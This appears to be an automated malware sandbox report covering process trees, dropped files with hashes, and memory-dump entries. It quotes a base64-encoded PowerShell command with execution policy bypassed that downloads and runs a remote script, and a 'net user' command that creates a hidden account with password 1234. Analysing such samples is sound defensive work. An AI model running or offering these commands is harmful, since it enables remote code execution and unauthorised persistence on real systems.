        cmdline: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        - Blacklisted process makes network request
        - Drops file in Windows directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C net user wgautilacc 1234
  [2] C:\Windows\system32\net.exe
      cmdline: net user wgautilacc 1234
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user wgautilacc 1234
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Admin\AppData\Local\Temp\2mqvfv1g\2mqvfv1g.dll
  MD5: 5c3fdd6eb3167f53dacd21e58e25d6e9
  SHA1: e2b1b2126e0deac5d3add3ed0c17a4f35a35a479
  SHA256: 972fd325be916b158c5611680d2f4fc7641f4251a31cae6d87cd49eca596ac37
  SHA512: 94902f796a93e3b10001659a74a586ce52b6b749563e5fd9d100837d3c49cd608bc84a27177b3af5fecce253fadb3ae8df3c1ddb5bfb2c5f2d858ebebf8115a0
C:\Users\Admin\AppData\Local\Temp\RES6420.tmp
  MD5: 456728124e35c03040fa9bf6dc028db8
  SHA1: 192c11879fe9e814389174d53712ad71f2bb32a4
  SHA256: 23724a98affdaa4dad082ba411b706fd757db96360a1addb0d5a4fca53749d28
  SHA512: 73a645477eaeb6d2c3c0802948ee8262c8f9c069184182a3066b0ca55798fc41543e813ee5105a89e305153d8d3e704aa7c19126f0034326f1108dc5b0701117
C:\Users\Admin\AppData\Local\Temp\get-points.ps1
  MD5: bcac3bbb18f093dbc8e5e76d2675695f
  SHA1: 96453f65b41e428937349e6f48fe67d6dfd6a580
  SHA256: b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a
  SHA512: 78c55502c7d0484b458fadb78bc075b8eda01b794e2037283df11dc58105bd632c0e747e92fd7aac7b79c5ac0ddce9bb2c6e7ce158c743c9f080a52eda0498ab
C:\Users\Admin\AppData\Local\Temp\get-points.zip
  MD5: 42c2a160d2d191e6ffcc1076b4734ee2
  SHA1: c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49
  SHA256: 2b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99
  SHA512: 3b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939
C:\Windows\system32\rfxvmt.dll
  MD5: dc39d23e4c0e681fad7a3e1342a2843c
  SHA1: 58fd7d50c2dca464a128f5e0435d6f0515e62073
  SHA256: 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
  SHA512: 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
\??\PIPE\lsarpc
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
\??\PIPE\samr
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
\??\PIPE\samr
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
\??\c:\Users\Admin\AppData\Local\Temp\2mqvfv1g\2mqvfv1g.0.cs
  MD5: 6f235215132cdebacd0f793fe970d0e3
  SHA1: 2841e44c387ed3b6f293611992f1508fe9b55b89
  SHA256: ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
  SHA512: a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\2mqvfv1g\2mqvfv1g.cmdline
MD5 7a1d2b78fb3a4498747ded0951eecd75
SHA1 c9330558337873d3461b2e7b4042534b2e1e800a
SHA256 d2b84931663e6da0a36a8e70be2d68b255acacab9ca22e87b82449cacd2d17c7
SHA512 f593c7b99593c39742876687fc7879b59537f9cfe1559c3c27aa71ce44e63602ce99863cccf824ee92028e6114b5daef0e64a13ae7e6c5cdba11d75e730e0c34
-
\??\c:\Users\Admin\AppData\Local\Temp\2mqvfv1g\CSCECA57343D3A14B89AA49B14023A79037.TMP
MD5 365e313cfc24df35586eddddcfd4abe5
SHA1 f53aecdadb712480ad027609832f8a9af59f76e6
SHA256 7258db462d4cff2b45fcd1533cd406e298bfd3a2345bf285a6171ef8fc17c185
SHA512 3ef3982ff4556d06117a310d69773822348c3c8419cce55df684ab3033bbd4076b828eb15789a938dc2ab36812640313f0753dfe617815d07bdc99285e853692
-
\Windows\Branding\mediasrv.png
MD5 f357d4e7b83bc0a41c65d97f3e6f50f4
SHA1 71db3180a8ada6d5d7722c54a5940c3490f78636
SHA256 db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba
SHA512 566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e
-
\Windows\Branding\mediasvc.png
MD5 d5de6f599d9807bac2f5a8e751a8c38f
SHA1 9e70edf56b6a5768fda84232e9c557e750d3631b
SHA256 18207938b456352ad540ed62fb113b7b11025a6d2b1de08728772c24c8553fca
SHA512 e526e3a75be31762bb5fc01f4450ff48391fe36a1e71aef6a89d3f262e523e2f7654501f43667a3e982a05835418e72ae26ec3ba955b8537a700e69e82337fc5
-
memory/304-76-0x0000000000000000-mapping.dmp
-
memory/332-55-0x0000000000000000-mapping.dmp
-
memory/344-64-0x0000000000000000-mapping.dmp
-
memory/388-43-0x0000000000000000-mapping.dmp
-
memory/472-58-0x0000000000000000-mapping.dmp
-
memory/556-56-0x0000000000000000-mapping.dmp
-
memory/580-57-0x0000000000000000-mapping.dmp
-
memory/636-117-0x0000000000000000-mapping.dmp
-
memory/656-63-0x0000000000000000-mapping.dmp
-
memory/816-62-0x0000000000000000-mapping.dmp
-
memory/820-40-0x0000000000000000-mapping.dmp
-
memory/872-72-0x0000000000000000-mapping.dmp
-
memory/928-39-0x0000000000000000-mapping.dmp
-
memory/948-86-0x0000000000000000-mapping.dmp
-
memory/1084-13-0x0000000000000000-mapping.dmp
-
memory/1084-53-0x0000000000000000-mapping.dmp
-
memory/1092-54-0x0000000000000000-mapping.dmp
-
memory/1096-78-0x0000000000000000-mapping.dmp
-
memory/1096-69-0x0000000000000000-mapping.dmp
-
memory/1100-52-0x0000000000000000-mapping.dmp
-
memory/1168-36-0x0000000000000000-mapping.dmp
-
memory/1268-48-0x0000000000000000-mapping.dmp
-
memory/1268-68-0x0000000000000000-mapping.dmp
-
memory/1324-61-0x0000000000000000-mapping.dmp
-
memory/1520-21-0x00000000027E0000-0x00000000027E1000-memory.dmp (Filesize 4KB)
-
memory/1520-35-0x0000000024620000-0x0000000024621000-memory.dmp (Filesize 4KB)
-
memory/1520-6-0x00000000023B0000-0x00000000023B1000-memory.dmp (Filesize 4KB)
-
memory/1520-17-0x0000000002270000-0x0000000002271000-memory.dmp (Filesize 4KB)
-
memory/1520-38-0x0000000002300000-0x0000000002310000-memory.dmp (Filesize 64KB)
-
memory/1520-18-0x0000000002610000-0x0000000002611000-memory.dmp (Filesize 4KB)
-
memory/1520-3-0x000007FEF55B0000-0x000007FEF5F9C000-memory.dmp (Filesize 9.9MB)
-
memory/1520-2-0x0000000000000000-mapping.dmp
-
memory/1520-5-0x000000001ACF0000-0x000000001ACF1000-memory.dmp (Filesize 4KB)
-
memory/1520-9-0x000000001C140000-0x000000001C141000-memory.dmp (Filesize 4KB)
-
memory/1520-7-0x0000000002460000-0x0000000002461000-memory.dmp (Filesize 4KB)
-
memory/1520-4-0x0000000002370000-0x0000000002371000-memory.dmp (Filesize 4KB)
-
memory/1520-34-0x0000000002340000-0x0000000002341000-memory.dmp (Filesize 4KB)
-
memory/1520-33-0x0000000002330000-0x0000000002331000-memory.dmp (Filesize 4KB)
-
memory/1524-80-0x000007FEF55B0000-0x000007FEF5F9C000-memory.dmp (Filesize 9.9MB)
-
memory/1524-97-0x0000000000F40000-0x0000000000F41000-memory.dmp (Filesize 4KB)
-
memory/1524-87-0x0000000000B00000-0x0000000000B01000-memory.dmp (Filesize 4KB)
-
memory/1524-115-0x000000001ABF0000-0x000000001ABF1000-memory.dmp (Filesize 4KB)
-
memory/1524-114-0x00000000010F0000-0x00000000010F1000-memory.dmp (Filesize 4KB)
-
memory/1524-107-0x000000001AB60000-0x000000001AB61000-memory.dmp (Filesize 4KB)
-
memory/1524-106-0x000000001A060000-0x000000001A061000-memory.dmp (Filesize 4KB)
-
memory/1524-99-0x0000000001050000-0x0000000001051000-memory.dmp (Filesize 4KB)
-
memory/1524-98-0x0000000000EB0000-0x0000000000EB1000-memory.dmp (Filesize 4KB)
-
memory/1524-79-0x0000000000000000-mapping.dmp
-
memory/1524-90-0x0000000019EA0000-0x0000000019EA1000-memory.dmp (Filesize 4KB)
-
memory/1524-96-0x0000000000EA0000-0x0000000000EA1000-memory.dmp (Filesize 4KB)
-
memory/1524-95-0x0000000000B20000-0x0000000000B21000-memory.dmp (Filesize 4KB)
-
memory/1584-85-0x0000000000000000-mapping.dmp
-
memory/1592-45-0x0000000000000000-mapping.dmp
-
memory/1596-44-0x0000000000000000-mapping.dmp
-
memory/1596-66-0x0000000000000000-mapping.dmp
-
memory/1612-49-0x0000000000000000-mapping.dmp
-
memory/1640-1-0x00000000025A0000-0x00000000025B1000-memory.dmp (Filesize 68KB)
-
memory/1640-0-0x0000000002260000-0x000000000259D000-memory.dmp (Filesize 3.2MB)
-
memory/1648-51-0x0000000000000000-mapping.dmp
-
memory/1684-46-0x0000000000000000-mapping.dmp
-
memory/1688-70-0x0000000000000000-mapping.dmp
-
memory/1688-10-0x0000000000000000-mapping.dmp
-
memory/1692-65-0x0000000000000000-mapping.dmp
-
memory/1744-71-0x0000000000000000-mapping.dmp
-
memory/1752-47-0x0000000000000000-mapping.dmp
-
memory/1780-42-0x0000000000000000-mapping.dmp
-
memory/1780-77-0x0000000000000000-mapping.dmp
-
memory/1820-73-0x0000000000000000-mapping.dmp
-
memory/1892-41-0x0000000000000000-mapping.dmp
-
memory/1940-116-0x0000000000000000-mapping.dmp
-
memory/2008-50-0x0000000000000000-mapping.dmp